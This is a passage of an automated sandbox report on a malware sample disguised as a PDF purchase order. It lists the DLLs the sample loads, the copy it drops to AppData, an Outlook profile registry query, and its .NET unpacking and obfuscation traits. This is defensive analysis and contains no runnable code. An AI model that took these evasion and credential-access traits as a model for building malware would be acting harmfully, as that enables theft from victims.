                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: umXx.pdbSHA256I/ source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: Binary string: umXx.pdb source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: PO-2024)bekotas.pdf.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.cs.Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.cs.Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.cs.Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: ctsdvwT.exe.5.dr, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: 0xC92BF28A [Sun Dec 13 15:55:54 2076 UTC]
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050FEFD5 push esp; retf 0_2_050FEFDC
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeCode function: 0_2_050F084A pushfd ; ret 0_2_050F0851
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 6_2_07483AD7 push ebx; retf 6_2_07483ADA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0183675D push FFFFFF8Bh; iretd 10_2_0183675F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F74757 push 00000069h; ret 10_2_07F74759
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F766F9 push 00000069h; ret 10_2_07F766FE
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F74557 push 00000069h; ret 10_2_07F74559
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7654E push ds; iretd 10_2_07F7654F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F742FE push 00000069h; ret 10_2_07F74300
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: section name: .text entropy: 7.976240450007284
                    Source: ctsdvwT.exe.5.drStatic PE information: section name: .text entropy: 7.976240450007284
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, JlyuJKV8Owx8Lf9RDcw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bo7T1yhSWB', 'Ul8TM4pbjl', 'DMvTjk76l7', 'eqYTh0BE2j', 'fefTJ4umIt', 'owoTtLtiOM', 'NlrTsC8IWx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, B9J5yi1Jym2nqaMIZ0.csHigh entropy of concatenated method names: 'ruALZLsSXO', 'TGHL02hyuk', 'x8AL1lHmmn', 'hydLMOIOHX', 'LCLLOwcVFS', 'pHULl3ELeF', 'lnWLPa8BXp', 'yb9LfiPtGg', 'oVeLKVU2aC', 'JqsLU26Jqx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, sODLhptNV6yYwU1XFD.csHigh entropy of concatenated method names: 'u4gbiUahQn', 'qagbQq45Yp', 'p8Q3RDnWT1', 'mgy3VLcJPE', 'SWGbwStRpT', 'aD3b0YWDaC', 'JTAbpQl8WR', 'bBrb1dTZbl', 'jUcbMd7tvI', 'YGdbjxOyyJ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, I86VotVRRhYSMqB6Frk.csHigh entropy of concatenated method names: 'ctk57cKslF', 'b1u5yKuMfe', 'uhK5Fshnv9', 'zOb5aIm3xh', 'HSi5CNGGj1', 'bwP5eAaEZs', 'kcq5kHXVDf', 'LeG563aOB5', 'Y2N5oZv4ov', 'Kjd59Ijki6'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, JBTdvCjksnJPGHlLaY.csHigh entropy of concatenated method names: 'ToString', 'XyF4w6QIbl', 'HjZ4OtHrjn', 'bec4lMBAwr', 'T064PUu6M0', 'CLu4f3J9ye', 'bZN4KRrmVk', 'h1W4UWkyKq', 'kFO4AZu4oZ', 'zIM4qe0LJh'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, VEQZVTU3wZMqQixHDl.csHigh entropy of concatenated method names: 'CHkg2C6yDY', 'WGFgr5H8PJ', 'tJqgXRISnf', 'ubkXQU1ajO', 'zmvXzFILIY', 'eBagRmas14', 'X4DgVguEBL', 'q1hgBBRIqq', 'pG2g81Oo8K', 'VGwgxGUv7O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, VhI1myhJdlPZw3gjUD.csHigh entropy of concatenated method names: 'mlubdxj8mV', 'xbTbW3TU4X', 'ToString', 'cBPb2U5kdJ', 'Mw7bSS8M6l', 'BpMbr7e4gE', 'XqYbcjNFW9', 'HdwbXnTDHT', 'HddbgmaPdu', 'Ae6bHyDr9O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, pSKOB9DuoTB3CsocvM.csHigh entropy of concatenated method names: 'eX93mB0WyQ', 'OGd3OcMwkN', 'rdk3lvgCMi', 'BDe3PHQGyo', 'elW315Q5lr', 'vbP3fjsZcA', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, mqgPgfzf11OAh2XEHP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ICv5EH8UCi', 'XN95L7fbsS', 'rJb5417mf2', 'wSD5bNRheS', 'Scd53WflMG', 'ViF558pi39', 'ftw5TJVEx4'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, gR6aGTQnxZi34rhdVO.csHigh entropy of concatenated method names: 'itc5Vp3v2w', 'rR758hC8vx', 'GkJ5xQbaPK', 'Fkb5286v2C', 'xdt5SlnEqS', 'yEr5cxromp', 'ss55XQQN4g', 'jdy3s5oNR6', 'H0I3ipfZf2', 'jZG3DWMdsp'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, ysBB4ZiT3mjNjpuWub.csHigh entropy of concatenated method names: 'vAK32ON2IB', 'KiM3SnGLpj', 'K7C3rP7Gox', 'rBw3c5K84T', 'SV23X5ubNo', 'Ilp3grDNl7', 'n9r3HLpnpM', 'rGm3npDedM', 'T9K3dPij6s', 'hSa3WQC7HU'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, pHwrk1oXeqNZQqFc9N.csHigh entropy of concatenated method names: 'EG6rayBj6g', 'AZSreYQAFX', 'h44r6dCQsr', 'jGHroNXtBK', 'ShbrLCisAj', 'hjar4Paa5A', 'Jw4rb5vYuX', 'xewr3EGaao', 'ekQr5CC2oj', 'fcJrTpjFwn'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, hQpU9npdBUdS3OSUKn.csHigh entropy of concatenated method names: 'rTWE699HDC', 'syiEoHspF2', 'xIcEmxeF6h', 'MTxEOIUmU5', 'dA3EPmKCAd', 'gs2EfGxk7D', 'grKEUF2kiJ', 'o70EAOFjU4', 'YDuEZSVhok', 'x69EwlrClA'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, myCkX99QhGioe2eWNK.csHigh entropy of concatenated method names: 'e83cCMVJyG', 'LIsckkAHw1', 'xj9rlknLZv', 'KVvrPt130S', 'VOtrftLPTb', 'srLrKiFDa2', 'SAYrUPerTp', 'y3CrAIyZTb', 'dl4rqu1Nsl', 'UlTrZAxCNQ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, nDwARLBnayTnwnH41L.csHigh entropy of concatenated method names: 'CRPF8E2KK', 'WZbaLk2dC', 'Suleihp2A', 'wt7kV1uJh', 'AaLoUM5C8', 'PyL93qeDa', 'h9V63WGpZdwe4wfIMt', 'afl8ovv6APtUop8CeL', 'cvF39mLbv', 'g8YTonqJd'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.csHigh entropy of concatenated method names: 'H118uq4iZf', 'pUX829qLU0', 'vim8Sva7V5', 'Gpg8rsuycJ', 'IbZ8cnxRlj', 'GRd8XHCoNv', 'mXe8gx8mfG', 'E018H8PHLA', 'fcD8nTVNIG', 'WFX8d5pEP8'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, A5ayCPmpCKiHfhIcHo.csHigh entropy of concatenated method names: 'YosXuFY1k1', 'VPOXSkrLZ6', 'SaAXcy3CMB', 'IEPXgnfl5g', 'iKFXHpUMYq', 'VJacJij7dQ', 'TOCctlxHQs', 'H9bcsStifx', 'vfhcioiNUj', 'M8rcD4g5BV'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, pC0y8FxliMCOFKsYwd.csHigh entropy of concatenated method names: 's0fVgyYiKU', 'glsVHcMNsP', 'QXeVdqNZQq', 'zc9VWNdyCk', 'feWVLNKa5a', 'yCPV4pCKiH', 'rq0vCSS6Ka0rCd9aeZ', 'jXc8bN1GTtd1BA4XKo', 'NtnVVdX3go', 'XcEV8K1jGq'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, GECskxqS5j9DrSYNHS.csHigh entropy of concatenated method names: 'DNTg7hV3y3', 'Wcbgywj4gN', 'nkqgFdvu5h', 'bWNga7ijSy', 'jBngC4sA9B', 'o9JgenHJM6', 'NC0gkqGtbV', 'BVdg67b3Oa', 'AbpgopQpVv', 'RWVg91fpTi'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, JyYiKU6SlscMNsPmbd.csHigh entropy of concatenated method names: 'BIeS1NGNn8', 'MckSM0ZtCf', 's8YSjCTeNv', 'npyShLLEZG', 'FJ1SJFYOm6', 'gIoSte4Mxx', 'KiiSsmYmrP', 'ov8Sigomay', 'oBtSD0YheW', 'pI8SQn5Fxe'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, d3xfOjSskEscOYP7bG.csHigh entropy of concatenated method names: 'Dispose', 'h1vVDb2vDI', 'uPUBO4GEs1', 'whHaaxv8Yi', 'E7sVQBB4ZT', 'rmjVzNjpuW', 'ProcessDialogKey', 'eb4BRSKOB9', 'eoTBVB3Cso', 'hvMBBSR6aG'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, JlyuJKV8Owx8Lf9RDcw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bo7T1yhSWB', 'Ul8TM4pbjl', 'DMvTjk76l7', 'eqYTh0BE2j', 'fefTJ4umIt', 'owoTtLtiOM', 'NlrTsC8IWx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, B9J5yi1Jym2nqaMIZ0.csHigh entropy of concatenated method names: 'ruALZLsSXO', 'TGHL02hyuk', 'x8AL1lHmmn', 'hydLMOIOHX', 'LCLLOwcVFS', 'pHULl3ELeF', 'lnWLPa8BXp', 'yb9LfiPtGg', 'oVeLKVU2aC', 'JqsLU26Jqx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, sODLhptNV6yYwU1XFD.csHigh entropy of concatenated method names: 'u4gbiUahQn', 'qagbQq45Yp', 'p8Q3RDnWT1', 'mgy3VLcJPE', 'SWGbwStRpT', 'aD3b0YWDaC', 'JTAbpQl8WR', 'bBrb1dTZbl', 'jUcbMd7tvI', 'YGdbjxOyyJ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, I86VotVRRhYSMqB6Frk.csHigh entropy of concatenated method names: 'ctk57cKslF', 'b1u5yKuMfe', 'uhK5Fshnv9', 'zOb5aIm3xh', 'HSi5CNGGj1', 'bwP5eAaEZs', 'kcq5kHXVDf', 'LeG563aOB5', 'Y2N5oZv4ov', 'Kjd59Ijki6'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, JBTdvCjksnJPGHlLaY.csHigh entropy of concatenated method names: 'ToString', 'XyF4w6QIbl', 'HjZ4OtHrjn', 'bec4lMBAwr', 'T064PUu6M0', 'CLu4f3J9ye', 'bZN4KRrmVk', 'h1W4UWkyKq', 'kFO4AZu4oZ', 'zIM4qe0LJh'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, VEQZVTU3wZMqQixHDl.csHigh entropy of concatenated method names: 'CHkg2C6yDY', 'WGFgr5H8PJ', 'tJqgXRISnf', 'ubkXQU1ajO', 'zmvXzFILIY', 'eBagRmas14', 'X4DgVguEBL', 'q1hgBBRIqq', 'pG2g81Oo8K', 'VGwgxGUv7O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, VhI1myhJdlPZw3gjUD.csHigh entropy of concatenated method names: 'mlubdxj8mV', 'xbTbW3TU4X', 'ToString', 'cBPb2U5kdJ', 'Mw7bSS8M6l', 'BpMbr7e4gE', 'XqYbcjNFW9', 'HdwbXnTDHT', 'HddbgmaPdu', 'Ae6bHyDr9O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, pSKOB9DuoTB3CsocvM.csHigh entropy of concatenated method names: 'eX93mB0WyQ', 'OGd3OcMwkN', 'rdk3lvgCMi', 'BDe3PHQGyo', 'elW315Q5lr', 'vbP3fjsZcA', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, mqgPgfzf11OAh2XEHP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ICv5EH8UCi', 'XN95L7fbsS', 'rJb5417mf2', 'wSD5bNRheS', 'Scd53WflMG', 'ViF558pi39', 'ftw5TJVEx4'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, gR6aGTQnxZi34rhdVO.csHigh entropy of concatenated method names: 'itc5Vp3v2w', 'rR758hC8vx', 'GkJ5xQbaPK', 'Fkb5286v2C', 'xdt5SlnEqS', 'yEr5cxromp', 'ss55XQQN4g', 'jdy3s5oNR6', 'H0I3ipfZf2', 'jZG3DWMdsp'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, ysBB4ZiT3mjNjpuWub.csHigh entropy of concatenated method names: 'vAK32ON2IB', 'KiM3SnGLpj', 'K7C3rP7Gox', 'rBw3c5K84T', 'SV23X5ubNo', 'Ilp3grDNl7', 'n9r3HLpnpM', 'rGm3npDedM', 'T9K3dPij6s', 'hSa3WQC7HU'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, pHwrk1oXeqNZQqFc9N.csHigh entropy of concatenated method names: 'EG6rayBj6g', 'AZSreYQAFX', 'h44r6dCQsr', 'jGHroNXtBK', 'ShbrLCisAj', 'hjar4Paa5A', 'Jw4rb5vYuX', 'xewr3EGaao', 'ekQr5CC2oj', 'fcJrTpjFwn'
